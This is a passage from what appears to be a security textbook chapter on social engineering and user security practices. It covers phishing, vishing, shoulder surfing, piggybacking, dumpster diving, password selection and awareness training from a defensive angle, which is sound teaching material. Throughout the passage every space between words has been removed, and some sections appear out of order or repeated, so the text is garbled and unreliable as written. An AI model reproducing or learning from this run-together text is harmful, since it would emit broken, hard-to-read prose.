phishingattempts(suchaseBayandPayPal)arecarefulabouttheirimagesandwillnotsendasecurity-relatede-mailtouserscontainingobviouserrors.Inaddition,almostunanimously,organizationstelltheirusersthattheywillneveraskforsensitiveinformation(suchasapasswordoraccountnumber)viaane-mail.TheURLofthewebsitethattheusersaretakentomayalsoprovideacluethatthesiteisnotwhatitappearstobe.Despitetheincreasingmediacoverageconcerningphishingattempts,someInternetusersstillfallforthem,whichresultsinattackerscontinuingtousethisrelativelycheapmethodtogaintheinformationtheyareseeking.
Anotherspecializedversionofphishingiscloselyrelatedtospearphishing.Again,specificindividualsaretargeted,butinthiscasetheindividualsareimportantindividualshighupinanorganizationsuchasthecorporateofficers.Thegoalistogoafterthese“biggertargets,”andthusthetermthatisusedtorefertothisformofattackiswhaling.
Arecentdevelopmenthasbeentheintroductionofamodificationtotheoriginalphishingattack.Spearphishingisthetermthathasbeencreatedtorefertothespecialtargetingofgroupswithsomethingincommonwhenlaunchingaphishingattack.Bytargetingspecificgroups,theratioofsuccessfulattacks(thatis,thenumberofresponsesreceived)tothetotalnumberofe-mailsormessagessentusuallyincreasesbecauseatargetedattackwillseemmoreplausiblethanamessagesenttousersrandomly.Pharmingconsistsofmisdirectinguserstofakewebsitesmadetolook
official.Usingphishing,individualsaretargetedonebyonebysendingoute-mails.Tobecomeavictim,therecipientmusttakeanaction(forexample,respondbyprovidingpersonalinformation).Inpharming,theuserwillbedirectedtothefakewebsiteasaresultofactivitysuchasDNSpoisoning(anattackthatchangesURLsinaserver’sdomainnametable)ormodificationoflocalhostfiles,whichareusedtoconvertURLstotheappropriateIPaddress.Onceatthefakesite,theusermaysupplypersonalinformation,believingthattheyareconnectedtothelegitimatesite.
VishingVishingisavariationofphishingthatusesvoicecommunicationtechnologytoobtaintheinformationtheattackerisseeking.Vishingtakesadvantageofthetrustthatsomepeopleplaceinthetelephonenetwork.Usersareunawarethatattackerscanspoof(simulate)callsfromlegitimateentitiesusingVoiceoverIP(VoIP)technology.Voicemessagingcanalsobecompromisedandusedintheseattempts.Generally,theattackersarehopingtoobtaincreditcardnumbersorotherinformationthatcanbeusedinidentitytheft.Theusermayreceiveane-mailaskinghimorhertocallanumberthatisansweredbyapotentiallycompromisedvoicemessagesystem.Usersmayalsoreceivearecordedmessagethatappearstocomefromalegitimateentity.Inbothcases,theuserwillbeencouragedtorespondquicklyandprovidethesensitiveinformationsothataccesstotheiraccountisnotblocked.Ifausereverreceivesamessagethatclaimstobefromareputableentityandasksforsensitiveinformation,theusershouldnotprovideitbutinsteadshouldusetheInternetorexaminealegitimateaccountstatementtofindaphonenumberthatcanbeusedtocontacttheentity.Theusercanthenverifythatthemessagereceivedwaslegitimateorreportthevishingattempt.
TechTip
BewareofVishingVishing(phishingconductedusingvoicesystems)isgenerallysuccessfulbecauseofthetrustthatindividualsplaceinthetelephonesystem.WithcallerID,peoplebelievetheycanidentifywhoitisthatiscallingthem.Theydonotunderstandthat,justlikemanyprotocolsintheTCP/IPprotocolsuite,callerIDcanbespoofed.
SPAMThoughnotgenerallyconsideredasocialengineeringissue,norasecurityissueforthatmatter,SPAMcan,however,beasecurityconcern.SPAM,
asjustabouteverybodyknows,isbulkunsolicitede-mail.Itcanbelegitimateinthesensethatithasbeensentbyacompanyadvertisingaproductorservice,butitcanalsobemaliciousandcouldincludeanattachmentthatcontainsmalicioussoftwaredesignedtoharmyoursystem,oralinktoamaliciouswebsitethatmayattempttoobtainpersonalinformationfromyou.Thoughnotaswellknown,avariationonSPAMisSPIM,whichisbasicallySPAMdeliveredviaaninstantmessagingapplicationsuchasYahoo!MessengerorAIM.ThepurposeofhostileSPIMisthesameasthatofSPAM—thedeliveryofmaliciouscontentorlinks.
ShoulderSurfingShouldersurfingdoesnotnecessarilyinvolvedirectcontactwiththetarget,butinsteadinvolvestheattackerdirectlyobservingtheindividualenteringsensitiveinformationonaform,keypad,orkeyboard.Theattackermaysimplylookovertheshoulderoftheuseratwork,forexample,ormaysetupacameraorusebinocularstoviewtheuserenteringsensitivedata.Theattackercanattempttoobtaininformationsuchasapersonalidentificationnumber(PIN)atanautomatedtellermachine(ATM),anaccesscontrolentrycodeatasecuregateordoor,oracallingcardorcreditcardnumber.Manylocationsnowuseasmallshieldtosurroundakeypadsothatitisdifficulttoobservesomebodyenteringinformation.Moresophisticatedsystemscanactuallyscramblethelocationofthenumberssothatthetoprowatonetimeincludesthenumbers1,2,and3andthenexttime4,8,and0.Whilethismakesitabitslowerfortheusertoenterinformation,itthwartsanattacker’sattempttoobservewhatnumbersarepressedandenterthesamebuttons/pattern,sincethelocationofthenumbersconstantlychanges.
Arelated,somewhatobvioussecurityprecautionisthatapersonshouldnotusethesamePINforalloftheirdifferentaccounts,gatecodes,andsoon,sinceanattackerwholearnsthePINforone
typeofaccesscouldthenuseitforalloftheothertypesofaccess.
Althoughmethodssuchasaddingshieldstoblockthevieworhavingthepad“scramble”thenumberscanhelpmakeshouldersurfingmoredifficult,thebestdefenseisforuserstobeawareoftheirsurroundingsandtonotallowindividualstogetintoapositionfromwhichtheycanobservewhattheuserisentering.Theattackermayattempttoincreasethechanceofsuccessfully
observingthetargetenteringthedatabystartingaconversationwiththetarget.Thisprovidesanexcusefortheattackertobephysicallyclosertothetarget.Otherwise,thetargetmaybesuspiciousiftheattackerisstandingtooclose.Inthissense,shouldersurfingcanbeconsideredasocialengineeringattack.
ReverseSocialEngineeringAslightlydifferentapproachtosocialengineeringiscalledreversesocialengineering.Inthistechnique,theattackerhopestoconvincethetargettoinitiatethecontact.Thisobviouslydiffersfromthetraditionalapproach,wherethetargetistheonethatiscontacted.Thereasonthisattackmaybesuccessfulisthat,sincethetargetistheoneinitiatingthecontact,attackersmaynothavetoconvincethetargetoftheirauthenticity.Thetrickypartofthisattackis,ofcourse,convincingthetargettomakethatinitialcontact.Possiblemethodstoaccomplishthismightincludesendingoutaspoofede-mail(fakee-maildesignedtoappearauthentic)thatclaimstobefromareputablesourceandprovidesanothere-mailaddressorphonenumbertocallfor“techsupport,”orpostinganoticeorcreatingaboguswebsiteforalegitimatecompanythatalsoclaimstoprovide“techsupport.”Thismaybeespeciallysuccessfuliftimedtocoincidewithacompany’sdeploymentofanewsoftwareorhardwareplatform.Anotherpotentialtimetotargetanorganizationwiththissortofattackiswhenthereisasignificantchangeintheorganizationitself,suchaswhentwocompaniesmergeorasmallercompanyisacquiredbyalargerone.Duringthesetimes,employeesarenotfamiliarwiththeneworganizationoritsprocedures,
andamidsttheconfusion,itiseasytoconducteitherasocialengineeringorreversesocialengineeringattack.
TechTip
BeAwareofReverseSocialEngineeringReversesocialengineeringisnotnearlyaswidelyunderstoodassocialengineeringandisabittrickiertoexecute.Iftheattackerissuccessfulinconvincinganindividualtomaketheinitialcontact,however,theprocessofconvincingthemoftheauthenticityoftheattackerisgenerallymucheasierthaninasocialengineeringattack.
HoaxesAtfirstglance,itmightseemthatahoaxrelatedtosecuritywouldbeconsideredanuisanceandnotarealsecurityissue.Thismightbethecaseforsomehoaxes,especiallythoseoftheurbanlegendtype,buttherealityofthesituationisthatahoaxcanbeverydamagingifitcausesuserstotakesomesortofactionthatweakenssecurity.Onerealhoax,forexample,describedanew,highlydestructivepieceofmalicioussoftware.Itinstructeduserstocheckfortheexistenceofacertainfileandtodeleteitifthefilewasfound.Inreality,thefilementionedwasanimportantfileusedbytheoperatingsystem,anddeletingitcausedproblemsthenexttimethesystemwasbooted.Thedamagecausedbyusersmodifyingsecuritysettingscanbeserious.Aswithotherformsofsocialengineering,trainingandawarenessarethebestandfirstlineofdefenseforbothusersandadministrators.Usersshouldbetrainedtobesuspiciousofunusuale-mailsandstoriesandshouldknowwhotocontactintheorganizationtoverifytheirvalidityiftheyarereceived.Hoaxesoftenalsoadvisetheusertosendittotheirfriendssotheyknowabouttheissueaswell—andbydoingso,theyhelpspreadthehoax.Usersneedtobesuspiciousofanye-mailtellingthemto“spreadtheword.”
PoorSecurityPracticesAsignificantportionofhuman-createdsecurityproblemsresultsfrompoorsecuritypractices.Thesepoorpracticesmaybethoseofanindividualuserwhoisnotfollowingestablishedsecuritypoliciesorprocesses,ortheymaybecausedbyalackofsecuritypolicies,procedures,ortrainingwithintheuser’sorganization.
PasswordSelectionFormanyyears,computerintrudershavereliedonusers’poorselectionofpasswordstohelptheintrudersintheirattemptstogainunauthorizedaccesstoasystemornetwork.Ifattackerscouldobtainalistoftheusers’names,chancesweregoodtheycouldeventuallyaccessthesystem.Userstendtopickpasswordsthatareeasyforthemtoremember,andwhateasierpasswordcouldtherebethanthesamesequenceofcharactersthattheyusefortheiruserID?Ifasystemhasanaccountwiththeusernamejdoe,anattacker’sreasonablefirstguessoftheaccount’spasswordwouldbejdoe.Ifthisdoesn’twork,theattackerwouldtryvariationsonthesame,suchasdoej,johndoe,johnd,andeodj,allofwhichwouldbereasonablepossibilities.
Poorpasswordselectionisoneofthemostcommonofpoorsecuritypractices,andoneofthemostdangerous.Numerousstudiesthathavebeenconductedonpasswordselectionhavefoundthat,whileoverallmoreusersarelearningtoselectgoodpasswords,asignificantpercentageofusersstillmakepoorchoices.Theproblemwiththis,ofcourse,isthatapoorpasswordchoicecanenableanattackertocompromiseacomputersystemornetworkmoreeasily.Evenwhenusershavegoodpasswords,theyoftenresorttoanotherpoorsecuritypractice—writingthepassworddowninaneasilylocatedplace,whichcanalsoleadtosystemcompromiseifanattackergainsphysicalaccesstothearea.
Iftheattacker’sattempttousevariationsontheusernamedoesnotyieldthecorrectpassword,theymightsimplyneedmoreinformation.Usersalsofrequentlypicknamesoffamilymembers,pets,orfavoritesportsteam.If
theuserlivesinSanAntonio,Texas,forexample,apossiblepasswordmightbegospursgoinhonorofthecity’sprofessionalbasketballteam.Iftheseattemptsdon’tworkfortheattacker,thentheattackermightnexttryhobbiesoftheuser,thenameoftheuser’sfavoritemakeormodelofcar,orsimilarpiecesofinformation.Thekeyisthattheuseroftenpickssomethingeasyforthemtoremember,whichmeansthatthemoretheattackerknowsabouttheuser,thebetterthechanceofdiscoveringtheuser’spassword.Inanattempttocomplicatetheattacker’sjob,organizationshave
encouragedtheiruserstomixupper-andlowercasecharactersandtoincludenumbersandspecialcharactersintheirpassword.Whilethisdoesmakethepasswordhardertoguess,thebasicproblemstillremains:userswillpicksomethingthatiseasyforthemtoremember.Thus,ouruserinSanAntoniomayselectthepasswordG0*Spurs*G0,capitalizingthreeoftheletters,insertingaspecialcharactertwice,andsubstitutingthenumberzerofortheletterO.Thismakesthepasswordhardertocrack,butthereareafinitenumberofvariationsonthebasicgospursgopassword,so,whiletheattacker’sjobhasbeenmademoredifficult,itisstillpossibletoguessthepassword.Organizationshavealsoinstitutedadditionalpoliciesandrulesrelating
topasswordselectiontofurthercomplicateanattacker’sefforts.Organizations,forexample,mayrequireuserstofrequentlychangetheirpassword.Thismeansthatifanattackerisabletoguessapassword,itisonlyvalidforalimitedperiodoftimebeforeanewpasswordisselected,afterwhichtheattackerislockedout.Allisnotlostfortheattacker,however,since,again,userswillselectpasswordstheycanremember.Forexample,passwordchangesoftenresultinanewpasswordthatsimplyincorporatesanumberattheendoftheoldone.Thus,ourSanAntoniousermightselectG0*Spurs*G1asthenewpassword,inwhichcasethebenefitofforcingpasswordchangesonaperiodic,orevenfrequent,basishasbeentotallylost.ItisagoodbetthatthenextpasswordchosenwillbeG0*Spurs*G2,followedbyG0Spurs*G3,andsoforth.
TechTip
HeartbleedVulnerabilityIn2014,avulnerabilityintheOpenSSLcryptographywasdiscoveredandgiventhenameHeartbleedbecauseitoriginatedintheheartbeatsignalemployedbythesystem.Thisvulnerabilityresultedinthepotentiallossofpasswordsandothersensitivedataacrossmultipleplatformsanduptoamillionwebserversandrelatedsystems.Heartbleedresultedinrandomdatalossfromservers,as64Kblocksofmemorywereexfiltratedfromthesystem.AmongtheitemsthatmaybelostinHeartbleedattacksareusercredentials,userIDs,andpasswords.ThediscoveryofthisvulnerabilityprompteduserstochangeamassivenumberofpasswordsacrosstheWeb,asusershadnoknowledgeastothestatusoftheircredentials.Oneofthecommonpiecesofadvicetouserswastonotreusepasswordsbetweensystems.Thisadviceisuniversallygoodadvice,notjustforHeartbleed,butforallsystems,allthetime.
Anotherpolicyorrulegoverningpasswordselectionoftenadoptedbyorganizationsisthatpasswordsmustnotbewrittendown.This,ofcourse,isdifficulttoenforce,andthususerswillfrequentlywritethemdown,oftenasaresultofwhatisreferredtoasthe“passworddilemma.”Themoredifficultwemakeitforattackerstoguessourpasswords,andthemorefrequentlyweforcepasswordchanges,themoredifficultthepasswordsareforauthorizeduserstorememberandthemorelikelytheyaretowritethemdown.Writingthemdownandputtingtheminasecureplaceisonething,butalltoooftenuserswillwritethemonaslipofpaperandkeepthemintheircalendar,wallet,orpurse.Mostsecurityconsultantsgenerallyagreethatiftheyaregivenphysicalaccesstoanoffice,theywillbeabletofindapasswordsomewhere—thetopdrawerofadesk,insideofadeskcalendar,attachedtotheundersideofthekeyboard,orevensimplyonayellow“stickynote”attachedtothemonitor.Withtheproliferationofcomputers,networks,andusers,thepassword
dilemmahasgottenworse.Today,theaverageInternetuserprobablyhasatleastahalfdozendifferentaccountsandpasswordstoremember.Selectingadifferentpasswordforeachaccount,followingtheguidelinesmentionedpreviouslyregardingcharacterselectionandfrequencyof
changes,onlyaggravatestheproblemofrememberingthepasswords.Thisresultsinusersalltoofrequentlyusingthesamepasswordforallaccounts.Ifauserdoesthis,andthenoneoftheaccountsisbroken,allotheraccountsaresubsequentlyalsovulnerabletoattack.
Knowtherulesforgoodpasswordselection.Generally,thesearetouseeightormorecharactersinyourpassword,includeacombinationofupper-andlowercaseletters,includeatleastonenumberandonespecialcharacter,donotuseacommonword,phrase,orname,andchooseapasswordthatyoucanremembersothatyoudonotneedtowriteitdown.
Theneedforgoodpasswordselectionandtheprotectionofpasswordsalsoappliestoanothercommonfeatureoftoday’selectronicworld,PINs.MostpeoplehaveatleastonePINassociatedwiththingssuchastheirATMcardorasecuritycodetogainphysicalaccesstoaroom.Again,userswillinvariablyselectnumbersthatareeasytoremember.Specificnumbers,suchastheindividual’sbirthdate,theirspouse’sbirthdate,orthedateofsomeothersignificantevent,areallcommonnumberstoselect.Otherpeoplewillpickpatternsthatareeasytoremember—2580,forexample,usesallofthecenternumbersonastandardnumericpadonatelephone.Attackersknowthis,andguessingPINsfollowsthesamesortofprocessthatguessingapassworddoes.Passwordselectionisanindividualactivity,andensuringthat
individualsaremakinggoodselectionsistherealmoftheentity’spasswordpolicy.Toensureusersmakeappropriatechoices,theyneedtobeawareoftheissueandtheirpersonalroleinsecuringaccounts.Aneffectivepasswordpolicyconveysboththeuserroleandresponsibilityassociatedwithpasswordusageanddoessoinasimpleenoughmannerthatitcanbeconveyedviascreennotesduringmandatedpasswordchangeevents.
ShoulderSurfing
Asdiscussedearlier,shouldersurfingdoesnotinvolvedirectcontactwiththeuser,butinsteadinvolvestheattackerdirectlyobservingthetargetenteringsensitiveinformationonaform,keypad,orkeyboard.Theattackermaysimplylookovertheshoulderoftheuseratwork,watchingasacoworkerenterstheirpassword.Althoughdefensivemethodscanhelpmakeshouldersurfingmoredifficult,thebestdefenseisforausertobeawareoftheirsurroundingsandtonotallowindividualstogetintoapositionfromwhichtheycanobservewhattheuserisentering.Arelatedsecuritycommentcanbemadeatthispoint:apersonshouldnotusethesamePINforalloftheirdifferentaccounts,gatecodes,andsoon,sinceanattackerwholearnsthePINforonecouldthenuseitforalltheothers.
PiggybackingPeopleareofteninahurryandwillfrequentlynotfollowgoodphysicalsecuritypracticesandprocedures.Attackersknowthisandmayattempttoexploitthischaracteristicinhumanbehavior.TailgatingorpiggybackingisthesimpletacticoffollowingcloselybehindapersonwhohasjustusedtheirownaccesscardorPINtogainphysicalaccesstoaroomorbuilding.Anattackercanthusgainaccesstothefacilitywithouthavingtoknowtheaccesscodeorhavingtoacquireanaccesscard.Itissimilartoshouldersurfinginthatitreliesontheattackertakingadvantageofanauthorizedusernotfollowingsecurityprocedures.Frequentlytheattackermayevenstartaconversationwiththetargetbeforereachingthedoorsothattheusermaybemorecomfortablewithallowingtheindividualinwithoutchallengingthem.Inthissensepiggybackingisrelatedtosocialengineeringattacks.Boththepiggybackingandshouldersurfingattacktechniquescanbeeasilycounteredbyusingsimpleprocedurestoensurenobodyfollowsyoutoocloselyorisinapositiontoobserveyouractions.Bothtechniquesrelyonthepoorsecuritypracticesofanauthorizedusertobesuccessful.Amoresophisticatedcountermeasuretopiggybackingisa“mantrap,”whichutilizestwodoorstogainaccesstothefacility.Theseconddoordoesnotopenuntilthefirstoneisclosedandisspacedcloseenoughtothefirstthatanenclosureisformedthatonlyallowsone
individualthroughatatime.
DumpsterDivingAsmentionedearlier,attackersneedacertainamountofinformationbeforelaunchingtheirattack.Onecommonplacetofindthisinformation,iftheattackerisinthevicinityofthetarget,isthetarget’strash.Theattackermightfindlittlebitsofinformationthatcouldbeusefulforanattack.Thisprocessofgoingthroughatarget’strashinhopesoffindingvaluableinformationthatmightbeusedinapenetrationattemptisknowninthecomputercommunityasdumpsterdiving.Thetacticisnot,however,uniquetothecomputercommunity;ithasbeenusedformanyyearsbyothers,suchasidentitythieves,privateinvestigators,andlawenforcementpersonnel,toobtaininformationaboutanindividualororganization.Iftheattackersareverylucky,andthetarget’ssecurityproceduresareverypoor,theymayactuallyfinduserIDsandpasswords.Asmentionedinthediscussiononpasswords,userssometimeswritetheirpassworddown.If,whenthepasswordischanged,theydiscardthepapertheoldpasswordwaswrittenonwithoutshreddingit,theluckydumpsterdivercangainavaluableclue.Eveniftheattackerisn’tluckyenoughtoobtainapassworddirectly,heundoubtedlywillfindemployeenames,fromwhichit’snothardtodetermineuserIDs,asdiscussedearlier.Finally,theattackermaygatheravarietyofinformationthatcanbeusefulinasocialengineeringattack.Inmostlocations,trashisnolongerconsideredprivatepropertyafterithasbeendiscarded(andevenwheredumpsterdivingisillegal,littleenforcementoccurs).Anorganizationshouldhavepoliciesaboutdiscardingmaterials.Sensitiveinformationshouldbeshreddedandtheorganizationshouldconsidersecuringthetrashreceptaclesothatindividualscan’tforagethroughit.Peopleshouldalsoconsidershreddingpersonalorsensitiveinformationthattheywishtodiscardintheirowntrash.Areasonablequalityshredderisinexpensiveandwellworththepricewhencomparedwiththepotentiallossthatcouldoccurasaresultofidentitytheft.
TryThis!DivingintoYourDumpsterTheamountofusefulinformationthatusersthrowawayinunsecuredtrashreceptaclesoftenamazessecurityprofessionals.Hackersknowthattheycanoftenfindmanuals,networkdiagrams,andevenuserIDsandpasswordsbyrummagingthroughdumpsters.Aftercoordinatingthiswithyoursecurityoffice,tryseeingwhatyoucanfindthatindividualsinyourorganizationhavediscarded(assumingthatthereisnoshreddingpolicy)byeithergoingthroughyourorganization’sdumpstersorjustthroughtheofficetrashreceptacles.Whatusefulinformationdidyoufind?Isthereanobvioussuggestionthatyoumightmaketoenhancethesecurityofyourorganization?
InstallingUnauthorizedHardwareandSoftwareOrganizationsshouldhaveapolicythatrestrictstheabilityofnormaluserstoinstallsoftwareandnewhardwareontheirsystems.Acommonexampleisauserinstallingunauthorizedcommunicationsoftwareandamodemtoallowthemtoconnecttotheirmachineatworkviaamodemfromtheirhome.Anothercommonexampleisauserinstallingawirelessaccesspointsothattheycanaccesstheorganization’snetworkfrommanydifferentareas.Intheseexamples,theuserhassetupabackdoorintothenetwork,circumventingalltheothersecuritymechanismsinplace.Theterm“roguemodem”or“rogueaccesspoint”maybeusedtodescribethesetwocases.Abackdoorisanavenuethatcanbeusedtoaccessasystemwhilecircumventingnormalsecuritymechanismsandcanoftenbeusedtoinstalladditionalexecutablefilesthatcanleadtomorewaystoaccessthecompromisedsystem.Securityprofessionalscanusewidelyavailabletoolstoscantheirownsystemsperiodicallyforeitheroftheseroguedevicestoensurethatusershaven’tcreatedabackdoor.
Ithasalreadybeenmentionedthatgainingphysicalaccesstoacomputersystemornetworkoftenguaranteesanattackersuccessinpenetratingthesystemorthenetworkitisconnectedto.Atthesametime,theremaybeanumberofindividualswhohaveaccesstoafacilitybutarenot
authorizedtoaccesstheinformationthesystemsstoreandprocess.Webecomecomplacenttotheaccesstheseindividualshavebecausetheyoftenquietlygoabouttheirjobsoastonotdrawattentiontothemselvesandtominimizetheimpactontheoperationoftheorganization.Theymayalsobeoverlookedbecausetheirjobdoesnotimpactthecorefunctionoftheorganization.Aprimeexampleofthisisthecustodialstaff.Becomingcomplacentabouttheseindividualsandnotpayingattentiontowhattheymayhaveaccessto,however,couldbeabigmistake,andusersshouldnotbelievethateverybodywhohasphysicalaccesstotheorganizationhasthesamelevelofconcernfororinterestinthewelfareoftheorganization.
Anothercommonexampleofunauthorizedsoftwarethatusersinstallontheirsystemsisgames.Unfortunately,notallgamescomeinshrink-wrappedpackages.NumeroussmallgamescanbedownloadedfromtheInternet.Theproblemwiththisisthatusersdon’talwaysknowwherethesoftwareoriginallycamefromandwhatmaybehiddeninsideit.Manyindividualshaveunwittinglyinstalledwhatseemedtobeaninnocuousgame,onlytohavedownloadedapieceofmaliciouscodecapableofmanythings,includingopeningabackdoorthatallowsattackerstoconnectto,andcontrol,thesystemfromacrosstheInternet.Becauseofthesepotentialhazards,manyorganizationsdonotallow
theiruserstoloadsoftwareorinstallnewhardwarewithouttheknowledgeandassistanceofadministrators.Manyorganizationsalsoscreen,andoccasionallyintercept,e-mailmessageswithlinksorattachmentsthataresenttousers.Thishelpspreventusersfrom,say,unwittinglyexecutingahostileprogramthatwassentaspartofawormorvirus.Consequently,manyorganizationshavetheirmailserversstripoffexecutableattachmentstoe-mailsothatuserscan’taccidentallycauseasecurityproblem.
DataHandlingUnderstandingtheresponsibilitiesofproperdatahandlingassociatedwithone’sjobisanimportanttrainingtopic.Informationcanbedeceptiveinthatitisnotdirectlytangible,andpeopletendtodevelopbadhabitsaroundotherjobmeasures…attheexpenseofsecurity.Employeesrequiretraininginhowtorecognizethedataclassificationandhandlingrequirementsofthedatatheyareusing,andtheyneedtolearnhowto
followtheproperhandlingprocesses.Ifcertaindataelementsrequirespecialhandlingbecauseofcontracts,laws,orregulations,thereistypicallyatrainingclauseassociatedwiththisrequirement.Personnelassignedtothesetasksshouldbespecificallytrainedwithregardtothesecurityrequirements.Thespiritofthetrainingclauseisyougetwhatyoutrain,andifsecurityoverspecificdatatypesisarequirement,thenitshouldbetrained.Thissameprincipleholdsforcorporatedata-handlingresponsibilities;yougetthebehaviorsyoutrainandreward.
PhysicalAccessbyNon-EmployeesAshasbeenmentioned,ifanattackercangainphysicalaccesstoafacility,chancesareverygoodthattheattackercanobtainenoughinformationtopenetratecomputersystemsandnetworks.Manyorganizationsrequireemployeestowearidentificationbadgeswhenatwork.Thisisaneasymethodtoquicklyspotwhohaspermissiontohavephysicalaccesstotheorganizationandwhodoesnot.Whilethismethodiseasytoimplementandcanbeasignificantdeterrenttounauthorizedindividuals,italsorequiresthatemployeesactivelychallengeindividualswhoarenotwearingtherequiredidentificationbadge.Thisisoneareawhereorganizationsfail.Combineanattackerwhoslipsinbypiggybackingoffofanauthorizedindividualandanenvironmentwhereemployeeshavenotbeenencouragedtochallengeindividualswithoutappropriatecredentialsandyouhaveasituationwhereyoumightaswellnothaveanybadgesinthefirstplace.Organizationsalsofrequentlybecomecomplacentwhenfacedwithwhatappearstobealegitimatereasontoaccessthefacility,suchaswhenanindividualshowsupwithawarmpizzaclaimingitwasorderedbyanemployee.Ithasoftenbeenstatedbysecurityconsultantsthatitisamazingwhatyoucanobtainaccesstowithapizzaboxoravaseofflowers.
Preventingaccesstoinformationisalsoimportantintheworkarea.Firmswithsensitive
informationshouldhavea“cleandeskpolicy”specifyingthatsensitiveinformationisnotleftunsecuredintheworkareawhentheworkerisnotpresenttoactascustodian.
Anotheraspectthatmustbeconsideredispersonnelwhohavelegitimateaccesstoafacilitybutalsohaveintenttostealintellectualpropertyorotherwiseexploittheorganization.Physicalaccessprovidesaneasyopportunityforindividualstolookfortheoccasionalpieceofcriticalinformationcarelesslyleftout.Withtheproliferationofdevicessuchascellphoneswithbuilt-incameras,anindividualcouldeasilyphotographinformationwithoutitbeingobvioustoemployees.Contractors,consultants,andpartnersfrequentlynotonlyhavephysicalaccesstothefacilitybutmayalsohavenetworkaccess.Otherindividualswhotypicallyhaveunrestrictedaccesstothefacilitywhennooneisaroundarenighttimecustodialcrewmembersandsecurityguards.Suchpositionsareoftencontractedout.Asaresult,hackershavebeenknowntotaketemporarycustodialjobssimplytogainaccesstofacilities.
CleanDeskPoliciesPreventingaccesstoinformationisalsoimportantintheworkarea.Firmswithsensitiveinformationshouldhavea“cleandeskpolicy”specifyingthatsensitiveinformationmustnotbeleftunsecuredintheworkareawhentheworkerisnotpresenttoactascustodian.Evenleavingthedeskareaandgoingtothebathroomcanleaveinformationexposedandsubjecttocompromise.Thecleandeskpolicyshouldidentifyandprohibitthingsthatarenotobviousuponfirstglance,suchaspasswordsonstickynotesunderkeyboardsandmousepadsorinunsecureddeskdrawers.
PeopleasaSecurityToolAninterestingparadoxwhenspeakingofsocialengineeringattacksisthatpeoplearenotonlythebiggestproblemandsecurityriskbutalsothebesttoolindefendingagainstasocialengineeringattack.Thefirststepacompanyshouldtaketofightpotentialsocialengineeringattacksisto
createthepoliciesandproceduresthatestablishtherolesandresponsibilitiesfornotonlysecurityadministratorsbutforallusers.Whatisitthatmanagementexpects,security-wise,fromallemployees?Whatisitthattheorganizationistryingtoprotect,andwhatmechanismsareimportantforthatprotection?
Perthe2014VerizonDataBreachInvestigationReport,introducedinChapter1,hackswerediscoveredmoreoftenbyinternalemployeesthanbyoutsiders.Thismeansthattraineduserscanbeanimportantpartofasecurityplan.
SecurityAwarenessProbablythesinglemosteffectivemethodtocounterpotentialsocialengineeringattacks,afterestablishmentoftheorganization’ssecuritygoalsandpolicies,isanactivesecurityawarenessprogram.Theextentofthetrainingwillvarydependingontheorganization’senvironmentandthelevelofthreat,butinitialemployeetrainingonsocialengineeringatthetimeapersonishiredisimportant,aswellasperiodicrefreshertraining.Animportantelementthatshouldbestressedintrainingaboutsocial
engineeringisthetypeofinformationthattheorganizationconsiderssensitiveandwhichmaybethetargetofasocialengineeringattack.Thereareundoubtedlysignsthattheorganizationcouldpointtoasindicativeofanattackerattemptingtogainaccesstosensitivecorporateinformation.Allemployeesshouldbeawareoftheseindicators.Thescopeofinformationthatanattackermayaskforisverylarge,andmanyquestionsattackersposemightalsobelegitimateinanothercontext(askingforsomeone’sphonenumber,forexample).Employeesshouldbetaughttobecautiousaboutrevealingpersonalinformationandshouldespeciallybealertforquestionsregardingaccountinformation,personallyidentifiableinformation,orpasswords.
TryThis!SecurityAwarenessProgramsAstrongsecurityeducationandawarenesstrainingprogramcangoalongwaytowardreducingthechancethatasocialengineeringattackwillbesuccessful.Awarenessprogramsandcampaigns,whichmightincludeseminars,videos,posters,newsletters,andsimilarmaterials,arealsofairlyeasytoimplementandnotverycostly.Thereisnoreasonforanorganizationtonothaveanawarenessprograminplace.AlotofinformationandideasareavailableontheInternet.SeewhatyoucanfindthatmightbeusableforyourorganizationthatyoucanobtainatnochargefromvariousorganizationsontheInternet.(Tip:CheckorganizationssuchasNISTandNSA,whichhavedevelopednumeroussecuritydocumentsandguidelines.)
Asafinalnoteonuserresponsibilities,corporatesecurityofficersmustcultivateanenvironmentoftrustintheiroffice,aswellasanunderstandingoftheimportanceofsecurity.Ifusersfeelthatsecuritypersonnelareonlytheretomaketheirlifedifficultortodredgeupinformationthatwillresultinanemployee’stermination,theatmospherewillquicklyturnadversarialandbetransformedintoan“usversusthem”situation.Securitypersonnelneedthehelpofallusersandshouldstrivetocultivateateamenvironmentinwhichusers,whenfacedwithaquestionablesituation,willnothesitatetocallthesecurityoffice.Insituationslikethis,securityofficesshouldremembertheoldadageof“don’tshootthemessenger.”
SecurityPolicyTrainingandProceduresPeopleinanorganizationplayasignificantroleinthesecuritypostureoftheorganization,Assuch,trainingisimportantasitcanprovidethebasisforawarenessofissuessuchassocialengineeringanddesiredemployeesecurityhabits.ThesearedetailedinChapter2.
Chapter4Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingregardingtherolepeoplecanplayinsecurity.
Definebasicterminologyassociatedwithsocialengineering
Socialengineeringisatechniqueinwhichtheattackerusesvariousdeceptivepracticestoconvincethetargetedpersontodivulgeinformationtheynormallywouldnotdivulge,ortoconvincethetargettodosomethingtheynormallywouldn’tdo.
Inreversesocialengineering,theattackerhopestoconvincethetargettoinitiatecontact.
Describestepsorganizationscantaketoimprovetheirsecurity
Organizationsshouldhaveapolicythatrestrictstheabilityofnormaluserstoinstallnewsoftwareandhardwareontheirsystems.
Contractors,consultants,andpartnersmayfrequentlyhavenotonlyphysicalaccesstothefacilitybutalsonetworkaccess.Othergroupsthataregivenunrestricted,andunobserved,accesstoafacilityarenighttimecustodialcrewmembersandsecurityguards.Botharepotentialsecurityproblemsandorganizationsshouldtakestepstolimittheseindividuals’access.
Thesinglemosteffectivemethodtocounterpotentialsocialengineeringattacks,afterestablishingtheorganization’ssecuritygoalsandpolicies,isanactivesecurityawarenessprogram.
Describecommonuseractionsthatmayputanorganization’sinformationatrisk
Nomatterhowadvancedsecuritytechnologyis,itwillultimatelybedeployedinanenvironmentwherethehumanelementmaybeitsgreatestweakness.
Attackersknowthatemployeesarefrequentlyverybusyanddon’tstoptothinkaboutsecurity.Theymayattempttoexploitthisworkcharacteristicthroughpiggybackingorshouldersurfing.
Recognizemethodsattackersmayusetogaininformationaboutanorganization
Formanyyearscomputerintrudershavereliedonusers’poorselectionofpasswordstohelptheintrudersintheirattemptstogainunauthorizedaccesstoasystemornetwork.
